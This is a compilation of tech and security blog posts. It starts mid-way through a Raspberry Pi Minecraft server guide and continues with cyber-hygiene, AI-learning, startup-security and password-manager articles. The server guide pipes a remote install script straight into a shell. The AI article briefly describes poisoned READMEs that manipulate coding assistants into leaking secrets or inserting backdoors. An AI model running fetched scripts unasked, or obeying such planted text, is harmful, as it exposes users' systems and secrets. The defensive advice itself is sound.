(Look up real UUIDs at mcuuid.net or just let the server populate whitelist.json after you whitelist add <name> from the console.)
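If you would rather script the lookup, Mojang’s public profile API returns the UUID without dashes. A small helper sketch (mc_uuid is my name for it; needs curl and jq):

```shell
mc_uuid() {
  # Fetch the undashed UUID for a player name, then re-insert the
  # dashes at positions 8-4-4-4-12, the format whitelist.json expects.
  curl -s "https://api.mojang.com/users/profiles/minecraft/$1" \
    | jq -r '.id | "\(.[0:8])-\(.[8:12])-\(.[12:16])-\(.[16:20])-\(.[20:32])"'
}
# usage: mc_uuid <player-name>
```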
A systemd Unit That Doesn’t Embarrass You
Aikar’s flags are the well-tested JVM tuning for Paper-family servers. Use them. Match -Xms and -Xmx to give the JVM a fixed heap — variable heap on a Pi causes long GC pauses.
For an 8 GB Pi with nothing else running, allocate 6 GB to the heap (leave 2 GB for the kernel and disk cache). For a 4 GB Pi, allocate 2.5 GB.
Create /etc/systemd/system/minecraft.service:
[Unit]
Description=Minecraft Paper Server
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=minecraft
Group=minecraft
WorkingDirectory=/opt/minecraft/server
ExecStart=/usr/bin/java \
-Xms6G -Xmx6G \
-XX:+UseG1GC \
-XX:+ParallelRefProcEnabled \
-XX:MaxGCPauseMillis=200 \
-XX:+UnlockExperimentalVMOptions \
-XX:+DisableExplicitGC \
-XX:+AlwaysPreTouch \
-XX:G1HeapWastePercent=5 \
-XX:G1MixedGCCountTarget=4 \
-XX:G1NewSizePercent=30 \
-XX:G1MaxNewSizePercent=40 \
-XX:G1HeapRegionSize=8M \
-XX:G1ReservePercent=20 \
-XX:G1MixedGCLiveThresholdPercent=90 \
-XX:G1RSetUpdatingPauseTimePercent=5 \
-XX:SurvivorRatio=32 \
-XX:+PerfDisableSharedMem \
-XX:MaxTenuringThreshold=1 \
-Dusing.aikars.flags=https://mcflags.emc.gs \
-Daikars.new.flags=true \
-jar paper.jar nogui
ExecStop=/usr/local/bin/mcrcon-stop
Restart=on-failure
RestartSec=10s
TimeoutStopSec=60s
# hardening
NoNewPrivileges=true
ProtectSystem=strict
ProtectHome=true
PrivateTmp=true
PrivateDevices=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictSUIDSGID=true
LockPersonality=true
ReadWritePaths=/opt/minecraft
[Install]
WantedBy=multi-user.target
The ExecStop script does a clean RCON shutdown — save-all flush then stop — so the world is consistent on disk. We’ll write that next.
RCON: Live Admin and Clean Shutdowns
Install mcrcon:
sudo apt install -y build-essential
git clone https://github.com/Tiiffi/mcrcon.git /tmp/mcrcon
cd /tmp/mcrcon && make && sudo install -m 0755 mcrcon /usr/local/bin/
Stash the password where root and the minecraft user can read it (the ExecStop hook runs as minecraft) and nobody else can:
sudo install -d -m 0750 -g minecraft /etc/minecraft
echo 'CHANGE_ME_TO_A_LONG_RANDOM_STRING' | \
sudo tee /etc/minecraft/rcon.pass > /dev/null
sudo chown root:minecraft /etc/minecraft/rcon.pass
sudo chmod 0640 /etc/minecraft/rcon.pass
The clean-shutdown helper, /usr/local/bin/mcrcon-stop:
#!/bin/bash
set -e
PASS=$(cat /etc/minecraft/rcon.pass)
mcrcon -H 127.0.0.1 -P 25575 -p "$PASS" \
"say Server stopping in 10 seconds..." \
"save-all flush" \
"save-off"
sleep 10
mcrcon -H 127.0.0.1 -P 25575 -p "$PASS" "stop"
sudo chmod 0755 /usr/local/bin/mcrcon-stop
Now bring it up:
sudo systemctl daemon-reload
sudo systemctl enable --now minecraft
sudo systemctl status minecraft
sudo journalctl -u minecraft -f
Live admin from the Pi (no need to attach to the console):
mcrcon -H 127.0.0.1 -P 25575 -p "$(sudo cat /etc/minecraft/rcon.pass)" \
"list"
Backups That Actually Restore
The world on disk is not consistent if you cp it while the server is running. The fix is to flush state via RCON, copy the world, then turn writes back on. Here’s /usr/local/bin/mc-backup:
#!/bin/bash
set -euo pipefail
WORLD_DIR=/opt/minecraft/server
BACKUP_DIR=/mnt/backups/minecraft
RCON_PASS=$(cat /etc/minecraft/rcon.pass)
STAMP=$(date +%Y%m%d-%H%M%S)
ARCHIVE="${BACKUP_DIR}/world-${STAMP}.tar.zst"
mkdir -p "$BACKUP_DIR"
# freeze autosave first, then flush pending state to disk
mcrcon -H 127.0.0.1 -P 25575 -p "$RCON_PASS" \
"say Backup starting" "save-off" "save-all flush"
trap 'mcrcon -H 127.0.0.1 -P 25575 -p "$RCON_PASS" "save-on" "say Backup finished" || true' EXIT
tar --use-compress-program=zstd -cf "$ARCHIVE" \
-C "$WORLD_DIR" world world_nether world_the_end \
server.properties whitelist.json ops.json banned-players.json banned-ips.json
# keep last 14 daily snapshots
find "$BACKUP_DIR" -name 'world-*.tar.zst' -mtime +14 -delete
sudo chmod 0755 /usr/local/bin/mc-backup
Schedule it via cron — not on the minecraft user, on root, since we want predictable PATH and exit codes:
sudo crontab -e
# every day at 04:30
30 4 * * * /usr/local/bin/mc-backup >> /var/log/mc-backup.log 2>&1
Mount /mnt/backups from somewhere off the Pi — a NAS via NFS, an external SSD, or push the archives off-site with restic or rclone. A backup that lives on the same disk as the world isn’t a backup; it’s a slightly delayed loss.
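A backup you have never restored is a hope, not a backup. The restore path is the mirror image of mc-backup: stop the unit (which triggers the clean RCON shutdown), unpack the snapshot over the server directory, fix ownership, start again. A sketch using the same paths as above (`mc_restore` is an illustrative name, not an existing tool, and it is destructive — it overwrites the current world):

```shell
# Restore one snapshot over the live server directory. Run as root.
# Destructive: the current world is replaced, so copy it aside first
# if you are at all unsure.
mc_restore() {
  local archive=$1                          # e.g. /mnt/backups/minecraft/world-20250101-043000.tar.zst
  local server_dir=/opt/minecraft/server
  systemctl stop minecraft                  # ExecStop does the clean RCON save + stop
  tar --use-compress-program=zstd -xf "$archive" -C "$server_dir"
  chown -R minecraft:minecraft "$server_dir"
  systemctl start minecraft
}
```

After a restore, watch `journalctl -u minecraft -f` and confirm the world actually loads before declaring victory. Do a test restore once a quarter; it is the only way to know the archives are good.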
Letting Friends Join, Ranked by Sensibleness
Best: Tailscale
Spin up Tailscale on the Pi and on your friends’ machines. Everyone gets a stable 100.x.x.x address; friends connect to mcpi (or the tailnet IP) on port 25565. No port forwarding, no exposing your home IP, end-to-end encrypted, free for personal use up to ~100 nodes.
curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up --ssh
Share the tailnet with your mates from the Tailscale admin console. They install Tailscale, accept the share, and join your server with the tailnet hostname.
Middle: a tunneling service (playit.gg, ngrok)
playit.gg is purpose-built for game servers; it gives you a public address that proxies into your Pi without you opening a port. Free tier works fine for small groups. Performance hit is minimal; latency adds 5–20 ms depending on the chosen exit node.
Last resort: open 25565 to the internet
Forward TCP/25565 from your router to the Pi. Add a UFW allow rule and lock down the rate at the router if you can:
sudo ufw allow 25565/tcp comment 'minecraft'
Then a Dynamic DNS record (DuckDNS, no-ip, or your registrar’s) so friends have a stable hostname. The risks are real — bots will find you within hours and try Bedrock/Java exploits, dictionary-attack any open ports they can see, and hammer the Pi. If you do this, keep enforce-whitelist=true, online-mode=true, fail2ban running, and never expose 22 to the internet — keep SSH on the LAN/Tailscale only.
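On the fail2ban point: out of the box it watches SSH, which covers most of what matters here. A minimal /etc/fail2ban/jail.local sketch — the thresholds are taste, not gospel:

```ini
[sshd]
enabled  = true
maxretry = 5
findtime = 10m
bantime  = 1h
```

Restart with `sudo systemctl restart fail2ban` and confirm it is watching with `fail2ban-client status sshd`.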
Monitoring: Catch Problems Before Players Do
In-game performance: install the Spark plugin. Drop the jar in /opt/minecraft/server/plugins/ and restart. Then in-game or via RCON:
/spark tps
/spark profiler --timeout 30
Pi-level: htop for the eyeball view, vcgencmd measure_temp for thermals, vcgencmd get_throttled to confirm you’re not throttling. If get_throttled returns anything other than 0x0, your cooler or PSU isn’t up to the job.
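The throttled value is a bitfield, and it is worth knowing which bits fired. A small decoder based on the documented bit meanings (the function name is mine; low bits mean "happening right now", bits 16 and up mean "has happened since boot"):

```shell
# Decode the hex value from `vcgencmd get_throttled`, e.g.:
#   decode_throttled "$(vcgencmd get_throttled | cut -d= -f2)"
# Returns 0 and prints "ok" only when no flag has ever been set.
decode_throttled() {
  local v=$(( $1 ))
  if (( v == 0 )); then echo "ok"; return 0; fi
  local msgs=()
  (( v & 0x1 ))     && msgs+=("under-voltage now")
  (( v & 0x2 ))     && msgs+=("arm frequency capped now")
  (( v & 0x4 ))     && msgs+=("throttled now")
  (( v & 0x8 ))     && msgs+=("soft temp limit now")
  (( v & 0x10000 )) && msgs+=("under-voltage since boot")
  (( v & 0x20000 )) && msgs+=("frequency cap since boot")
  (( v & 0x40000 )) && msgs+=("throttling since boot")
  (( v & 0x80000 )) && msgs+=("soft temp limit since boot")
  echo "${msgs[*]}"
  return 1
}
```

Anything in the "since boot" bits on a server that has been up a while means the PSU or cooler has let you down at least once — worth fixing before it happens mid-raid.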
For a longer-term picture, drop a Prometheus node-exporter on the Pi and scrape it from a Grafana box on your network. For Minecraft itself, minecraft-exporter hooks into Spark and gives you TPS, MSPT, player count, and chunk counts as Prom metrics.
Other Pi 5–Friendly Servers, in Brief
The same shape (dedicated user, systemd unit, NVMe storage, backup script, Tailscale) applies to all of these.
- Terraria via TShock — runs on Mono. 6–10 player worlds are comfortable on a Pi 5.
- PocketMine-MP — Bedrock-edition Minecraft for phones/console players. Lighter than Java; happy on a 4 GB Pi.
- Factorio headless — one of the best-optimised servers around. Works fine on Pi 5 for small (~4-player) games. The official binary is x86_64; you’ll want the ARM64 community build or a box64 wrapper.
- Vintage Story — survival sandbox, Mono-based. Light enough for a small group, heavier than Terraria.
Heavy hitters that won’t run usefully on a Pi 5: ARK, 7 Days to Die, Valheim with mods, Project Zomboid with a dozen players. The Pi is a small server, not a magic one.
Final Thought
A Pi 5 game server is peak geek: cheap, quiet, and good enough to run the shared world your group actually plays in. Done right, it doubles as a Linux training lab — you’ll learn systemd, JVM tuning, RCON scripting, backups, networking, and zero-trust ingress, all in one box that costs less than a single AAA game.
Get the cooler. Get the NVMe. Use Tailscale. Whitelist your mates. Back up the world. The rest is just blowing up blocky mountains after work.
A Starter Guide to Personal Cyber Hygiene (For Non‑Tech People)
You don’t need to be a hacker. You just need better habits.
A Starter Guide to Personal Cyber Hygiene (For Non‑Tech People)
Most people don’t need to become hackers. They just need to stop making life easy for the ones who are. Personal cyber hygiene is the digital equivalent of brushing your teeth: small habits, done regularly, that stop bigger problems later.
Here’s a simple, non‑technical starter guide you can hand to friends, family, or anyone who just wants to be “harder to hack” without learning what a buffer overflow is.
1. Passwords: Stop Reusing the Same One Everywhere
If you only fix one thing, fix this. Reusing the same password on lots of sites is how one small leak turns into your email, shopping, and bank accounts all being at risk.
Do this instead:
- Use a password manager (1Password, Bitwarden, etc.).
- Make your email password strong and unique and never reuse it.
- Don’t keep passwords in plain text notes or on sticky notes stuck to your screen.
2. Turn On Two‑Factor Authentication (2FA / MFA)
2FA means even if someone knows your password, they still need a code from your phone or a key.
Turn it on for:
- Email accounts.
- Banking and financial apps.
- Social media.
- Anything that really matters.
Apps (Google/Microsoft Authenticator, Authy) are better than SMS, but SMS is still better than nothing.
3. Be Careful What You Click (Phishing)
Most attacks on regular people start with a dodgy email, text, or message.
Basic checks:
- Unexpected messages about parcels, bank issues, or account problems: treat them as suspicious by default.
- Check the sender’s address and where links really go before clicking.
- Never enter your password after clicking a link in an email; type the website address in yourself.
- Be wary of unexpected attachments, especially ZIPs and Office docs asking you to “enable content.”
- If a message contains a link to a site, don’t use it; type the known address into your browser yourself.
If in doubt, don’t click. Ask someone you trust or contact the company using details from their official site.
4. Keep Your Devices Updated
Updates often contain security fixes.
Good habits:
- Turn on automatic updates on phones, tablets, and computers.
- Let your web browser update itself.
- If a device is so old it no longer gets updates, think hard before using it for banking or important accounts.
5. Be Sensible on Wi‑Fi
Public Wi‑Fi is convenient but not always safe.
- Avoid banking or logging into important accounts on public Wi‑Fi if you can.
- Turn off “auto connect” to open networks.
- For sensitive stuff, your mobile data is often safer than a random free hotspot.
At home:
- Use a strong Wi‑Fi password.
- Don’t leave the router on its default password or admin login.
6. Back Up What You Care About
If your only copy of something lives on one device, you don’t really own it.
Simple backup options:
- Cloud backup/sync (for photos and important documents).
- External hard drive you plug in regularly, back up to, then unplug and store safely.
Backups protect you from ransomware, hardware failure, and accidents.
7. Use Basic Protection
You don’t need to become a security pro, but:
- Use built‑in security (Windows Defender, macOS/XProtect, mobile security settings).
- Consider reputable security software if you want extra features.
- Check privacy settings on social media and lock down who can see what.
8. Watch Your Digital Footprint
The more information about you that’s public, the easier it is for scammers.
- Don’t overshare personal details on public profiles.
- Be careful with “fun” quizzes and apps that ask for lots of personal info.
- Occasionally Google yourself and adjust privacy settings if needed.
- Don’t post holiday snaps whilst you’re away.
9. Take an Hour a Month for “Digital Housekeeping”
Once a month:
- Check for updates.
- Review your most important accounts and make sure 2FA is still on.
- Clear out apps you don’t use.
- Scan bank and card statements for unfamiliar charges.
Little and often beats trying to fix everything after something bad happens.
10. Don’t Be Afraid to Ask for Help
You don’t have to understand all the jargon to stay safer.
If something feels off, or tries to rush you:
- Pause.
- Ask someone you trust.
- Contact the company via their official website or phone number, not via the link you were sent.
Scammers rely on panic and speed. Slowing down is one of the best defences you have.
Using AI to Learn Without Turning Your Brain to Slop
How to use AI as a tutor, not a copy‑paste vending machine
Using AI to Learn Without Turning Your Brain to Slop
AI can be the best mentor you’ve never had — or the fastest way to become that engineer who pastes things into prod they don’t understand.
Let’s talk about using it to learn skills, not outsource thinking.
AI as a Tutor, Not a Typist
Good uses:
- Ask for conceptual explanations in your own words: “Explain Kubernetes Services as if I’m a network engineer.”
- Ask for comparisons: “Helm vs Kustomize vs plain YAML — when is each a good fit?”
- Ask for step‑by‑step plans: “Build me a 4‑week plan to learn web app hacking with real labs.”
- Use it as a rubber duck on steroids. Explaining a problem clearly enough for an AI to help often surfaces the answer before it even replies — the forced articulation is the value. Pay attention when that happens; that’s your brain doing the actual work.
Then:
- Run the commands yourself.
- Break the lab intentionally.
- Ask follow‑up questions until you can explain it without notes.
Bad use:
- “Give me a complete Terraform module/K8s deployment for X” and shipping it straight to prod without review.
Prompts That Actually Make You Smarter
Steal these. Tweak the topic. Notice the shape — every one of them puts the work back on you.
- The reverse-tutor. “Explain X. Then ask me three questions to check I understood. Don’t give the answers until I try.”
- The Socratic mentor. “I want to learn Kubernetes networking. Ask me questions until you’re confident I understand it. Don’t lecture; just probe.”
- The diff reviewer. “Review this code. Don’t fix anything yet — tell me what’s wrong and why, and let me try the fix.”
- The pair-debugger. “I’ll describe a bug. Ask me what I’ve already tried, what I think the cause is, and what I observed — before suggesting causes.”
- The mock interviewer. “Give me 5 senior-engineer interview questions on JWT security. Mark my answers harshly. Show me what a strong answer looks like only after I’ve answered.”
You’ll notice none of these are “write me X”. That’s the point.
Trust, but Verify
AI confidently makes things up. Non-existent CLI flags, wrong RFC numbers, deprecated APIs, libraries that have never been published. The output is fluent regardless of whether it’s right, and the fluency is the trap — a wrong answer in a confident voice is worse than no answer at all, because it stops you looking further.
Treat the output like a confident-sounding Wikipedia article: useful starting point, never the source of truth.
- Run the command. If it errors, the man page is closer to the truth than the chat window.
- Check version numbers and release dates against the actual project, not the model’s memory.
- For security-relevant code, read the real library docs before pasting.
- For anything you’re going to say out loud in a meeting, find a primary source.
Code, Licences, and Legal Slop
Many models are trained on public code that is:
- Licensed under GPL, MIT, Apache, proprietary, or unknown.
- Vulnerable, outdated, or outright wrong.
Risks:
- You accidentally pull in code that is effectively a derivative work of a GPL project and then drop it into your closed‑source product.
- You copy code containing someone else’s secrets or identifiers.
- You adopt patterns that conflict with your company’s coding standards or policies.
Safer pattern:
- Use AI to explain a pattern, then implement your own version.
- Use it to review your code: “Is there any obvious security issue in this handler?”
- Ask it to translate concepts between languages instead of dumping raw blocks into your repo.
And if your company has legal or OSS counsel: talk to them about policy. Don’t guess.
Security Implications of AI‑Generated Code
Security concerns:
- Insecure defaults. Missing auth, weak crypto, sloppy input validation.
- Hidden assumptions. Relies on global state, works only in trivial examples.
- Prompt injection if you build AI into your product.
- Code-copilot context exfiltration. Copilot, Cursor, and the rest send context to a third party. A poisoned README or comment in a dependency can manipulate suggestions to leak secrets sitting in your buffer or insert subtle backdoors. Audit what your editor sends, where, and check your org’s policy on it.
- Hallucinated package names. AI happily suggests `import requests-helper` or `npm install fast-yaml-parser` for libraries that don’t exist. Attackers register the typo-squat after watching what AI tends to invent (sometimes called “slopsquatting”). Always verify a package exists on the real registry, with real download counts and a real maintainer, before installing.
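The check is cheap enough to script. Both PyPI and npm expose package metadata over plain HTTPS, so a quick existence probe looks something like this (`check_pkg` is an illustrative name; this proves existence only — you still want to eyeball downloads, age, and maintainer on the registry page):

```shell
# Return 0 if the package exists on the named registry, 1 if not.
# PyPI 404s at /pypi/<name>/json for unknown packages; npm 404s at /<name>.
check_pkg() {
  local kind=$1 pkg=$2 url
  case "$kind" in
    pypi) url="https://pypi.org/pypi/${pkg}/json" ;;
    npm)  url="https://registry.npmjs.org/${pkg}" ;;
    *)    echo "usage: check_pkg pypi|npm <package>" >&2; return 2 ;;
  esac
  if curl -fsS -o /dev/null "$url"; then
    echo "${pkg}: exists on ${kind}"
  else
    echo "${pkg}: NOT found on ${kind} - possible hallucination"
    return 1
  fi
}
```

Thirty seconds of `check_pkg pypi whatever-the-model-suggested` before `pip install` is a lot cheaper than a supply-chain incident.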
Defensive moves:
- Treat AI‑generated code like code from an unknown contributor.
- Run SAST, DAST, and dependency scanning as standard.
- Build a code review culture where reviewers feel comfortable saying “I don’t think you really understand this block; let’s rewrite it.”
Remember: attackers are also using AI — to generate payloads, fuzz inputs, and explore weird corners of your stack faster.
Learning With AI vs Learning From AI
If you want to really learn:
- Use AI to test you, not just teach you: “Give me 5 interview‑style questions about JWT security and then mark my answers.”
- Get it to play “Socratic mentor”: “Ask me questions until you’re confident I understand Kubernetes networking.”
- Iterate: each time you solve something in a lab (THM room, CTF challenge), get AI to help you produce a writeup — then refine it yourself.
Using AI as scaffolding for your own thinking makes you dangerous in the good way. Using it as a copy‑paste vending machine makes you a liability.
Symptoms You’ve Stopped Learning
The early-warning signs are subtle. Catch yourself doing any of these and step away from the chat window for an afternoon.
- You can’t debug your own code without pasting the error in.
- You can’t explain why something in your repo is structured the way it is.
- You ask AI before trying anything yourself — even five-second things you used to do reflexively.
- You paste error messages into the chat verbatim before even reading them.
- You can’t write a 200-line program from a blank file without help.
- You feel anxious when the AI is slow or unavailable.
If two or more of those land, you’re not using AI to learn; you’re using it as a prosthetic. Take an afternoon off the tools, fix something hard the slow way, and remember why you got into this.
Final Thought
AI should be the slightly annoying teacher that keeps asking “why?”, not the friend who lets you copy their homework.
If you come out of a session with AI understanding the concept well enough to explain it to someone else, you’ve used it right. If you come out with a blob of code you can’t quite explain… you’ve just added a future incident ticket with your name on it.
For the development side of all this — keeping AI useful in your workflow without losing your security or your soul — see AI-Assisted Development Without Losing Your Soul or Your Security when it lands. For the offence/defence side, Blue Team vs AI Red Team.
Work-Life Balance in Tech Isn't a Wellness Poster
How to stay sane in startups and still ship
Work-Life Balance in Tech Isn’t a Wellness Poster
Work-life balance in tech isn’t about scented candles and a mindfulness app you never open. It’s about not burning your life down for someone else’s backlog, especially in startups, where the line gets blurred on purpose.
Let’s talk about what balance actually looks like when you’re shipping hard, how to protect yourself, and what a halfway decent leadership team should be doing.
Hustle Culture vs Actually Getting Things Done
Tech and startups love the myth of the heroic 80-hour week. “We’re a family.” “We’re all in this together.” Translation: we didn’t plan properly and you’re going to pay for it with your evenings.
A few awkward truths:
- Burnout is ridiculously common among software engineers and worse in fast-moving environments.
- Long hours past a certain point don’t increase output; they just increase mistakes and attrition.
- Startups with “permanent crunch” often lose their best people just as things get interesting.
Balance is not “never work late.” Balance is “if we push hard for a week, it’s unusual, deliberate, and followed by recovery.” It’s not the default.
Why Startups Are Uniquely Bad at Balance
Startups are ambiguity machines. Common patterns:
- You wear five hats: infra, security, release engineer, part-time therapist.
- Everything is “critical” because priorities are fuzzy.
- Slack and PagerDuty bleed into evenings, weekends, and holidays because nobody drew a line.
Passion hides overwork. If you care about the mission, it’s easy to normalise 12-hour days. Remote/hybrid blurs home and work until your laptop might as well be grafted onto your hands.
None of this is inevitable. It’s a choice by founders, managers, and sometimes by us when we don’t set boundaries.
What Work-Life Balance Actually Looks Like
Real balance looks like:
- Defined work hours that mean something.
- Protected off-time: no expectation of responding to non-urgent messages at night or on holidays.
- Deep work without constant pings: meeting-free or Slack-light blocks so you can actually think.
- Pacing, not sprinting forever: intense pushes followed by deliberate slowdowns.
Personally, it also means:
- Having non-negotiables outside tech (family, hobbies, sport, whatever).
- Being able to stop thinking about that broken microservice long enough to sleep properly.
How to Protect Yourself Without Torching Your Career
Practical moves:
- Set explicit boundaries and communicate them.
- Guardrails around tools: mute non-critical channels outside work, separate work and personal profiles.
- Say “yes, but”: “Yes, I can jump on this incident, but that means feature X slips, which do you prefer?”
- Use data: track hours and error rates; bring that to your manager if things creep into 60-70 hour territory.
- Know your line: decide what “too far” looks like (permanent weekends, missing important life stuff, health impacts).
If the company normalises that for months, that’s data about the culture, not a reflection on you.
What Good Leaders and Startups Should Be Doing
Healthy leadership:
- Plans realistically and cuts scope instead of casually demanding heroics.
- Models boundaries, e.g. not sending non-urgent messages at 11 pm.
- Has a clear on-call structure with compensation and recovery time.
- Talks about burnout like it’s real, because it is.
If you’re leading a team: this is part of your job. If you’re not yet, this is what you should expect from the people who are.
Final Thought
The industry loves to talk about “sustainable scaling” for systems. It talks a lot less about sustainable scaling for humans.
Work-life balance isn’t about doing less. It’s about choosing where your energy goes so you can still show up sharp for your team, your users, and your life outside the keyboard. If your current setup makes that impossible, the problem isn’t your resilience. It’s the system you’re in and systems can be changed, or left.
From ‘We’re Just a Startup’ to ‘We’re a Target’
Building a security baseline before the big clients arrive
From “We’re Just a Startup” to “We’re a Target”
Every founder tells themselves the same story: “We’ll sort security later, once we’ve proved the product.” Then “later” arrives in the form of big‑name clients, vendor questionnaires, and — if you’re unlucky — attackers.
You don’t need a Fortune 500 security budget. You do need a baseline.
The Things You Should Never Have Skipped
Some controls should exist from day zero:
- Identity and access management basics: unique accounts, MFA everywhere, no shared “admin” logins.
- Secrets management: no API keys in `.env` files committed to Git; use a proper secrets store.
- Environment separation: clear dev/test/prod boundaries, with restricted access to prod.
- Logging: centralised logs for infra and apps, retained long enough to investigate incidents.
If you’re moving from scrappy startup to “we have serious clients now,” you need to check:
- Are backups tested and restorable?
- Do you have at least a basic incident response plan (who does what, when)?
- Do you know your data flows and where customer data actually lives?
What Becomes Non‑Negotiable as You Grow
Once you’re holding sensitive data for large clients, the must‑haves look like:
- Formal access control (RBAC) across cloud, K8s, CI/CD, and SaaS; no “everyone is Owner on the project” nonsense.
- Strong endpoint security for staff laptops (disk encryption, EDR, patching).
- Vendor risk management: don’t shove your data into random SaaS without understanding how they secure it.
- Vulnerability management: regular scanning plus a way to triage and remediate, not just create tickets that rot.
For many B2B contracts you’ll be asked about:
- SOC 2 / ISO 27001 alignment, or at least controls inspired by them.
- Data residency and retention policies.
- How you handle security incidents and notify customers.
You don’t need a certificate on day one, but you do need credible answers.
Security by Phase, Not by Panic
Think in phases:
Seed / Early:
- Harden IAM, MFA, secrets, backups.
- Get basic logging and alerting in place.
- Document minimal policies (acceptable use, access control).
Series A:
- Formalise RBAC, separate duties in prod vs dev.
- Introduce security reviews for major features.
- Start threat modelling your core architecture.
Post‑Enterprise Logo:
- Dedicated security owner (if not a team).
- Regular third‑party tests (pentests, cloud config reviews).
- Clear change management around risky systems.
Security that grows with you beats security you panic‑buy after the first breach.
A One-Page Baseline Checklist (Stick This in a Doc)
Steal this. Adjust the owners. Tick or red-flag every line. If a row stays red for more than a quarter, it’s a backlog item that’s earned the right to a real conversation about scope vs scale.
# Startup Security Baseline — last reviewed: ____
## Identity & access
- [ ] SSO (Google / Okta / Entra) for every SaaS that supports it
- [ ] MFA mandatory on email, Git, cloud console, and IdP
- [ ] No shared "admin" logins; per-human accounts only
- [ ] Joiner/leaver checklist with same-day SaaS deprovisioning
- [ ] Break-glass admin account documented + tested quarterly
## Code & secrets
- [ ] No secrets in repos (gitleaks pre-commit + CI scan)
- [ ] Secrets stored in Vault / cloud secret manager (not .env)
- [ ] Per-env secrets separation (no prod creds in dev)
- [ ] Dependency scanning on every PR (Snyk / Trivy / Dependabot)
- [ ] SAST on every PR (Semgrep / GitHub Advanced Security)
## Cloud & infra
- [ ] IaC for everything that matters (Terraform / Pulumi)
- [ ] Cloud config monitoring (Security Hub / Defender for Cloud / SCC)
- [ ] No public S3/Blob/GCS unless explicit, reviewed, and tagged
- [ ] Production access via SSO + JIT (no standing admin)
- [ ] CloudTrail / Audit Logs / Activity Logs centralised + retained
## Endpoints
- [ ] Disk encryption (FileVault / BitLocker) on every laptop
- [ ] EDR / antivirus running, signatures fresh
- [ ] OS patch SLA (e.g. 14 days for high CVEs)
- [ ] MDM enrolled (Intune / Jamf / Kandji)
- [ ] Lock screen, password manager use, screen-share hygiene baked in
## Data
- [ ] Customer data classified (where it lives, who can see it)
- [ ] Encryption at rest + in transit, no exceptions
- [ ] Backups exist, are tested, and stored off the production account
- [ ] Data retention + deletion policy written and enforced
- [ ] DSAR / right-to-be-forgotten process documented
## Process
- [ ] Documented IR plan with on-call rotation
- [ ] Vendor risk: every third-party tool reviewed before onboarding
- [ ] Acceptable Use Policy + AI usage policy signed at hire
- [ ] Annual security awareness training (real, not slideware)
- [ ] At least one pentest in the last 12 months
This is roughly the SOC 2 / ISO 27001 starter scope mapped to engineering reality. Most B2B questionnaires from sensible buyers boil down to “show me you can answer most of these confidently”. You don’t need certificates on day one; you need to be able to walk a serious customer through this list without inventing things.
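For the “no secrets in repos” row specifically, the pre-commit framework makes gitleaks a two-minute job. A sketch of `.pre-commit-config.yaml` (pin `rev` to a release you’ve actually checked; v8.18.0 is an example, not a recommendation):

```yaml
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks
```

Run `pre-commit install` once per clone, and run the same scan in CI with `gitleaks detect --source .` so the hook can’t simply be skipped.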
For the cloud-side deepening, see Building a Cloud Security Baseline: From S3 Buckets to CNAPP. For the architecture this lives inside, Zero Trust Architecture: A Deep Practical Walkthrough.
Final Thought
If you’re already signing big clients, congratulations: you’re now interesting to people you’d rather weren’t interested in you.
You can’t retroactively secure year one, but you can stop pretending that “we’re just a startup” is still a valid excuse. Draw a line, build a baseline, and make “we take security seriously” something you can demonstrate — not just say.
Password Managers: The Least Exciting Tool That Will Absolutely Save You
Stop playing password roulette with your life
Password Managers: The Least Exciting Tool That Will Absolutely Save You
Passwords are still everywhere, still terrible, and still the root cause of a ridiculous number of breaches. A password manager is the boring, unsexy solution that quietly fixes most of this.
Let’s talk about why you should be using one, how to choose it, and what can still go wrong.
Why Password Managers Matter
Without a manager, humans:
- Reuse passwords across multiple sites.
- Use predictable patterns (“Summer2026!”, “CompanyName123”).
- Struggle to rotate credentials when breached.
A good password manager:
- Generates long, random, unique passwords per site.
- Stores them encrypted behind a single strong master passphrase (and ideally a hardware key).
- Syncs across devices so you’re not tempted to text yourself passwords or store them in notes apps.
For attackers, password reuse is a goldmine. For defenders, stopping reuse is one of the highest‑ROI moves you can make.
What Makes a Good Password Manager?
Look for:
- End‑to‑end encryption with audited, documented cryptography.
- Zero‑knowledge architecture (provider can’t see your vault contents).
- Support for FIDO2/WebAuthn and TOTP, so you can centralise MFA management.
- Open‑source clients or at least strong independent audits.
For organisations:
- Enterprise features: role‑based sharing, provisioning/de‑provisioning, audit logs.
- Group vaults for shared infrastructure creds that cannot live in Slack or Confluence.
But Aren’t Password Managers a Big Single Point of Failure?
Yes — which is why you:
- Use a strong, unique master passphrase, not a password.
- Turn on hardware‑backed 2FA (security keys) wherever possible.
- Keep an offline recovery method for emergencies (printed recovery key in a safe, etc.).
The practical risk trade‑off:
- One well‑protected vault vs dozens or hundreds of weak, reused passwords scattered everywhere.
- When a site is breached, you only rotate one credential, not 20.
We have enough real single points of failure (S3 buckets, CI tokens, admin panels). This is one you can manage.
Common Failure Modes and How to Avoid Them
Things that still go wrong:
- Users disable autofill and copy‑paste into phishing sites that look identical.
- Shared accounts are handed around outside the manager “because it’s quicker.”
- Admins keep master credentials in plain text somewhere “just in case.”
Mitigations:
- Pair password managers with phishing‑resistant auth (FIDO2).
- Educate: teach people to look for the browser extension’s “this is a saved site” signal rather than the URL bar alone.
- Make the password manager the easiest path, not the compliance burden.
Final Thought
Password managers won’t make you invincible. They will, however, move you from “trivially compromised by the first breach” to “attacker has to actually work for it.”
If you only implement one security habit this month, make it this one: pick a manager, move your email, bank, and socials into it, and retire your mental list of three recycled passwords for good.
How To Write a CTF Writeup That’s Actually Worth Reading
And why this skill makes you a better security professional
How To Write a CTF Writeup That’s Actually Worth Reading
You’ve rooted the box, grabbed the flag, and you’re buzzing. The temptation is to slam the “completed” button and move on. But how you document what just happened matters more than most people realise.
Good writeups aren’t flex pieces. They’re tools, for your future self, for the community, and for your career.
Why Bother Writing It Up?
A solid writeup helps you:
- Cement knowledge: explaining an attack chain in your own words makes it stick.
- Build a portfolio: great for roles in pentesting, detection engineering, AppSec, or DFIR.
- Contribute to the community: other learners stand on your shoulders the way you stood on someone else’s.
And, crucially, it trains you to tell a story. Incident reports, post‑mortems, and bug bounty submissions are all just more formal, higher‑stakes versions of CTF writeups.
Structure: Tell the Story, Don’t Dump Commands
A good template:
- Overview: target, platform (THM, HTB, CTF name), category (web, pwn, forensics, etc.), difficulty.
- Recon: scans, enumeration, key findings, why they mattered.
- Initial Access: vulnerability identified, exploitation steps, payloads, screenshots where useful.
